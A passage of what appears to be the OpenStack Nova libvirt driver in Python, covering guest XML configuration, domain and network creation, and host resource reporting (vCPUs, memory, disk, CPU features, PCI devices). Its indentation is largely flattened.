else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
instance.root_device_name = root_device_name
instance.save()
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt.virt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt.virt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt.virt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt.virt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.libvirt.xen_hvmloader_path
if CONF.libvirt.virt_type in ("kvm", "qemu"):
caps = self._get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self._get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
guest.os_mach_type = self._get_machine_type(image_meta, caps)
if CONF.libvirt.virt_type == "lxc":
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt.virt_type == "uml":
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt.virt_type == "xen":
guest.os_cmdline = "ro root=%s" % root_device_name
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if CONF.libvirt.virt_type == "qemu":
guest.os_cmdline += " no_timer_check"
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
# we only support os_command_line with images with an explicit
# kernel set and don't want to break nova if there's an
# os_command_line property without a specified kernel_id param
if image_meta:
img_props = image_meta.get('properties', {})
if img_props.get('os_command_line'):
guest.os_cmdline = img_props.get('os_command_line')
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if ((CONF.libvirt.virt_type != "lxc" and
CONF.libvirt.virt_type != "uml")):
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_LI('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt.virt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
arch = libvirt_utils.get_arch(image_meta)
if arch in ("i686", "x86_64"):
# NOTE(rfolco): HPET is a hardware timer for x86 arch.
# qemu -no-hpet is not supported on non-x86 targets.
tmhpet = vconfig.LibvirtConfigGuestTimer()
tmhpet.name = "hpet"
tmhpet.present = False
clk.add_timer(tmhpet)
for config in self._get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
flavor):
guest.add_device(config)
for vif in network_info:
config = self.vif_driver.get_config(
instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
guest.add_device(config)
if ((CONF.libvirt.virt_type == "qemu" or
CONF.libvirt.virt_type == "kvm")):
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
add_video_driver = False
if ((CONF.vnc_enabled and
CONF.libvirt.virt_type not in ('lxc', 'uml'))):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
add_video_driver = True
if CONF.spice.enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
add_video_driver = True
if add_video_driver:
VALID_VIDEO_DEVICES = ("vga", "cirrus", "vmvga", "xen", "qxl")
video = vconfig.LibvirtConfigGuestVideo()
# NOTE(ldbragst): The following logic sets the video.type
# depending on supported defaults given the architecture,
# virtualization type, and features. The video.type attribute can
# be overridden by the user with image_meta['properties'], which
# is carried out in the next if statement below this one.
arch = libvirt_utils.get_arch(image_meta)
if guest.os_type == vm_mode.XEN:
video.type = 'xen'
elif arch in ('ppc', 'ppc64'):
            # NOTE(ldbragst): PowerKVM doesn't support 'cirrus' by default,
            # so use 'vga' instead when running on Power hardware.
video.type = 'vga'
elif CONF.spice.enabled:
video.type = 'qxl'
if img_meta_prop.get('hw_video_model'):
video.type = img_meta_prop.get('hw_video_model')
if (video.type not in VALID_VIDEO_DEVICES):
raise exception.InvalidVideoMode(model=video.type)
# Set video memory, only if the flavor's limit is set
video_ram = int(img_meta_prop.get('hw_video_ram', 0))
max_vram = int(flavor.extra_specs
.get('hw_video:ram_max_mb', 0))
if video_ram > max_vram:
raise exception.RequestedVRamTooHigh(req_vram=video_ram,
max_vram=max_vram)
if max_vram and video_ram:
video.vram = video_ram
guest.add_device(video)
        # The QEMU guest agent is only supported by 'qemu' and 'kvm'
if CONF.libvirt.virt_type in ('qemu', 'kvm'):
qga_enabled = False
            # Enable qga only if the 'hw_qemu_guest_agent' property is 'yes'
hw_qga = img_meta_prop.get('hw_qemu_guest_agent', 'no')
if hw_qga.lower() == 'yes':
LOG.debug("Qemu guest agent is enabled through image "
"metadata", instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if (img_meta_prop.get('hw_rng_model') == 'virtio' and
flavor.extra_specs.get('hw_rng:allowed',
'').lower() == 'true'):
rng_device = vconfig.LibvirtConfigGuestRng()
rate_bytes = flavor.extra_specs.get('hw_rng:rate_bytes', 0)
period = flavor.extra_specs.get('hw_rng:rate_period', 0)
if rate_bytes:
rng_device.rate_bytes = int(rate_bytes)
rng_device.rate_period = int(period)
if (CONF.libvirt.rng_dev_path and
not os.path.exists(CONF.libvirt.rng_dev_path)):
raise exception.RngDeviceNotExist(
path=CONF.libvirt.rng_dev_path)
rng_device.backend = CONF.libvirt.rng_dev_path
guest.add_device(rng_device)
if CONF.libvirt.virt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self._get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt.virt_type)
watchdog_action = flavor.extra_specs.get('hw_watchdog_action',
'disabled')
if (image_meta is not None and
image_meta.get('properties', {}).get('hw_watchdog_action')):
watchdog_action = image_meta['properties']['hw_watchdog_action']
# NB(sross): currently only actually supported by KVM/QEmu
if watchdog_action != 'disabled':
if watchdog_actions.is_valid_watchdog_action(watchdog_action):
bark = vconfig.LibvirtConfigGuestWatchdog()
bark.action = watchdog_action
guest.add_device(bark)
else:
raise exception.InvalidWatchdogAction(action=watchdog_action)
return guest
def _get_guest_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
if image_meta is None:
image_ref = instance['image_ref']
image_meta = compute_utils.get_image_metadata(
context, self._image_api, image_ref, instance)
# NOTE(danms): Stringifying a NetworkInfo will take a lock. Do
# this ahead of time so that we don't acquire it while also
# holding the logging lock.
network_info_str = str(network_info)
msg = ('Start _get_guest_xml '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s '
'block_device_info=%(block_device_info)s' %
{'network_info': network_info_str, 'disk_info': disk_info,
'image_meta': image_meta, 'rescue': rescue,
'block_device_info': block_device_info})
# NOTE(mriedem): block_device_info can contain auth_password so we
# need to sanitize the password in the message.
LOG.debug(logging.mask_password(msg), instance=instance)
conf = self._get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info,
context)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug('End _get_guest_xml xml=%(xml)s',
{'xml': xml}, instance=instance)
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
dom_info = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[dom_info[0]],
'max_mem': dom_info[1],
'mem': dom_info[2],
'num_cpu': dom_info[3],
'cpu_time': dom_info[4],
'id': virt_dom.ID()}
def _create_domain_setup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
rootfs_dev = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
try:
# Save rootfs device to disconnect it when deleting the instance
if rootfs_dev:
instance.system_metadata['rootfs_device_name'] = rootfs_dev
instance.save()
except Exception:
with excutils.save_and_reraise_exception():
self._create_domain_cleanup_lxc(instance)
def _create_domain_cleanup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
# The domain may not be present if the instance failed to start
state = None
if state == power_state.RUNNING:
# NOTE(uni): Now the container is running with its own private
# mount namespace and so there is no need to keep the container
# rootfs mounted in the host namespace
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
err = None
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_setup_lxc(instance)
try:
if xml:
err = _LE('Error defining a domain with XML: %s') % xml
domain = self._conn.defineXML(xml)
if power_on:
err = _LE('Error launching a defined domain with XML: %s') \
% domain.XMLDesc(0)
domain.createWithFlags(launch_flags)
if not utils.is_neutron():
err = _LE('Error enabling hairpin mode with XML: %s') \
% domain.XMLDesc(0)
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
if err:
LOG.error(err)
finally:
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_cleanup_lxc(instance)
return domain
def _neutron_failed_callback(self, event_name, instance):
LOG.error(_LE('Neutron Reported failure on event '
'%(event)s for instance %(uuid)s'),
{'event': event_name, 'uuid': instance.uuid})
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active', True) is False]
def _create_domain_and_network(self, context, xml, instance, network_info,
block_device_info=None, power_on=True,
reboot=False, vifs_already_plugged=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
conf = self._connect_volume(connection_info, disk_info)
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
vol['connection_info'] = connection_info
vol.save(context)
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
timeout = CONF.vif_plugging_timeout
if (self._conn_supports_start_paused and
utils.is_neutron() and not
vifs_already_plugged and power_on and timeout):
events = self._get_neutron_events(network_info)
else:
events = []
launch_flags = events and libvirt.VIR_DOMAIN_START_PAUSED or 0
domain = None
try:
with self.virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance,
network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
domain = self._create_domain(
xml, instance=instance,
launch_flags=launch_flags,
power_on=power_on)
self.firewall_driver.apply_instance_filter(instance,
network_info)
except exception.VirtualInterfaceCreateException:
# Neutron reported failure and we didn't swallow it, so
# bail here
with excutils.save_and_reraise_exception():
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
except eventlet.timeout.Timeout:
# We never heard from Neutron
LOG.warn(_LW('Timeout waiting for vif plugging callback for '
'instance %(uuid)s'), {'uuid': instance['uuid']})
if CONF.vif_plugging_is_fatal:
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
raise exception.VirtualInterfaceCreateException()
# Resume only if domain has been paused
if launch_flags & libvirt.VIR_DOMAIN_START_PAUSED:
domain.resume()
return domain
def _get_all_block_devices(self):
"""Return all block devices in use on this node."""
devices = []
for dom in self._list_instance_domains():
try:
doc = etree.fromstring(dom.XMLDesc(0))
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the XML from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def _get_interfaces(self, xml):
"""Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_vcpu_total(self):
"""Get available vcpu number of physical computer.
        :returns: the number of cpu cores that instances can use.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
            LOG.warn(_LW("Cannot get the number of cpus, because this "
                         "function is not implemented for this platform."))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = hardware.get_vcpu_pin_set()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
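        # Example: with 8 physical cpus and vcpu_pin_set restricting the
        # usable ids to, say, {2, 3, 6, 7}, the reported total is 4; a
        # highest id of 8 or more would raise the Invalid exception above.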
def _get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def _get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt.images_type == 'lvm':
info = lvm.get_volume_group_info(
CONF.libvirt.images_volume_group)
elif CONF.libvirt.images_type == 'rbd':
info = LibvirtDriver._get_rbd_driver().get_pool_info()
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / units.Gi
return info
def _get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu(s) that are currently being used.
"""
total = 0
if CONF.libvirt.virt_type == 'lxc':
return total + 1
for dom in self._list_instance_domains():
try:
vcpus = dom.vcpus()
except libvirt.libvirtError as e:
                LOG.warn(_LW("couldn't obtain the vcpu count from domain id:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
else:
if vcpus is not None and len(vcpus) > 1:
total += len(vcpus[1])
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return total
def _get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
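            # /proc/meminfo is parsed as a flat token list where each value
            # follows its label, e.g. ['MemTotal:', '16344056', 'kB',
            # 'MemFree:', '8124392', 'kB', ...] (hypothetical numbers), hence
            # the idx + 1 lookups; values are in kB.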
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self._list_instance_domains(only_guests=False):
try:
dom_mem = int(dom.info()[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
# the memory reported by dom0 is greater than what
# it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self._get_memory_mb_total() - avail / units.Ki
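# Worked example with illustrative /proc/meminfo numbers: if the file
# reports MemFree: 2048000 kB, Buffers: 512000 kB and Cached: 1024000 kB,
# then avail = 3584000 kB = 3500 MB, so on a host with 16384 MB total
# this method returns 16384 - 3500 = 12884 MB for the non-Xen case.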
def _get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def _get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def _get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def _get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self._get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def _get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self._get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
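# For illustration only, the JSON produced above might look like:
# {"arch": "x86_64", "model": "SandyBridge", "vendor": "Intel",
#  "topology": {"sockets": 1, "cores": 4, "threads": 2},
#  "features": ["aes", "sse4.1", "sse4.2"]}
# (actual values depend on the host capabilities reported by libvirt).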
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
An assignable PCI device can be a normal PCI device,
a SR-IOV Physical Function (PF), or a SR-IOV Virtual
Function (VF). Only normal PCI devices or SR-IOV VFs
are assignable, while SR-IOV PFs are always owned by
hypervisor.
Please notice that a PCI device with SR-IOV
capability but not enabled is reported as normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
phys_address = "%s:%s:%s.%s" % (
fun_cap.device_addrs[0][0].replace("0x", ''),
fun_cap.device_addrs[0][1].replace("0x", ''),
fun_cap.device_addrs[0][2].replace("0x", ''),
fun_cap.device_addrs[0][3].replace("0x", ''))
return {'dev_type': 'type-VF',
'phys_function': phys_address}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
# requirement by DataBase Model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
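# Illustrative example (hypothetical device): a function at domain 0x0000,
# bus 0x05, slot 0x00, function 0x1 is formatted as "0000:05:00.1";
# id slices such as "0x10ed"[2:6] -> "10ed" and "0x8086"[2:6] -> "8086"
# would give a label of "label_8086_10ed".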
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def _get_pci_passthrough_devices(self):
"""Get host PCI devices information.
Obtains pci devices information from libvirt, and returns
as a JSON string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
Refer to the objects/pci_device.py for more idea of these keys.
:returns: a JSON string containing a list of the assignable PCI
devices information
"""
# Bail early if we know we can't support `listDevices` to avoid
# repeated warnings within a periodic task
if not getattr(self, '_list_devices_supported', True):
return jsonutils.dumps([])
try:
dev_names = self._conn.listDevices('pci', 0) or []
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
self._list_devices_supported = False
LOG.warn(_LW("URI %(uri)s does not support "
"listDevices: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
return jsonutils.dumps([])
else:
raise
pci_info = []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug("Trying to get stats for the volume %s",
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
"Got volume usage stats for the volume=%(volume)s,"
" rd_req=%(rd_req)d, rd_bytes=%(rd_bytes)d, "
"wr_req=%(wr_req)d, wr_bytes=%(wr_bytes)d",
stats, instance=instance)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk_id):
"""Note that this function takes an instance name."""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk_id)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_LI('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk_id,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_LI('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, iface_id):
"""Note that this function takes an instance name."""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(iface_id)
def get_console_pool_info(self, console_type):
# TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.",
tmp_file, instance=instance)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
